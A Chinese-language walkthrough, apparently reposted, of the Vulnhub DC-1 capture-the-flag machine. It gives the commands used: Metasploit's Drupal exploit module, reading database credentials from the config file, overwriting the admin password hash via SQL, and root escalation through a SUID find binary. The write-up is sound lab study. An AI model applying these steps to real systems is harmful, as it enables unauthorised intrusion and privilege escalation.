您的位置:首页 > 财经 > 产业 > Vulnhub靶场 DC-1

Vulnhub靶场 DC-1

2024/12/23 6:29:28 来源:https://blog.csdn.net/2302_80472909/article/details/142033897  浏览:    关键词:Vulnhub靶场 DC-1

靶机地址
https://www.vulnhub.com/entry/dc-1-1,292/
导入到VMware里面先编辑虚拟机设置,选择NAT模式

在这里插入图片描述然后具体的扫描一下ip地址
可以看到一些开放的端口
在这里插入图片描述
尝试爆破一下ssh的密码
cewl爬取网站的信息,生成字典
hydra进行爆破
但是没有有效的结果
在这里插入图片描述
访问一下网站, 可以发现是Drupal CMS
在这里插入图片描述

打开msfconsole 搜索看看有无相关的漏洞利用

在这里插入图片描述

search drupal
在这里插入图片描述
show options 查看模块需要配置的参数
需要配置一下rhosts
在这里插入图片描述
set rhosts 192.168.75.133
然后 run 运行
进入到shell里面
在这里插入图片描述

flag1

ls可以看到一个flag1.txt

给了一个提示, 需要找配置文件
在这里插入图片描述

搜一下说是在sites目录下的字目录default 中
在这里插入图片描述

flag2

在配置文件里面找到了flag2 以及 mysql数据库的用户名和密码
(需要提取或者爆破)
在这里插入图片描述

运行一个shell
在这里插入图片描述然后再使用一个python的交互式
python3 -c 'import pty;pty.spawn("/bin/bash")'方便看
在这里插入图片描述用find命令找到一个flag4
在这里插入图片描述

flag4

在这里插入图片描述这告诉我们需要提权, 查看后面flag

先继续之前的mysql

mysql -u dbuser -pR0ck3t进入到mysql里面

show databases;
use drupaldb;

在这里插入图片描述
show tables;
在这里插入图片描述

查看一下表, 发现admin信息
在这里插入图片描述admin的密码是经过加密的, 无法得知
文章: https://drupalchina.cn/node/2128
在这里插入图片描述

需要修改admin的密码, 找到password-hash.sh文件
在这里插入图片描述php scripts/password-hash.sh admin修改密码
在这里插入图片描述进入到数据库里面, 替换密码为 得到的密码
$S$D.s8wCozzq8y7h0NtDSfasvAE/Soq5Ieig.0MoiMBKekYSocvVLm

在这里插入图片描述

update users set pass="$S$D.s8wCozzq8y7h0NtDSfasvAE/Soq5Ieig.0MoiMBKekYSocvVLm" where name="admin";
在这里插入图片描述
然后就是登录网站了
admin / admin成功登录
在这里插入图片描述

flag3

找到flag3
在这里插入图片描述

提示了一个find的命令
在这里插入图片描述
find / -user root -perm -4000 -print 2>/dev/null
可以找到find具有suid权限
在这里插入图片描述
find /etc/passwd -exec whoami \;
可以发现是root权限
在这里插入图片描述
find / -name 666 -exec "/bin/sh" \;
接下来就是root的权限执行命令了
在这里插入图片描述

finalflag

找到最后的flag
在这里插入图片描述

在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com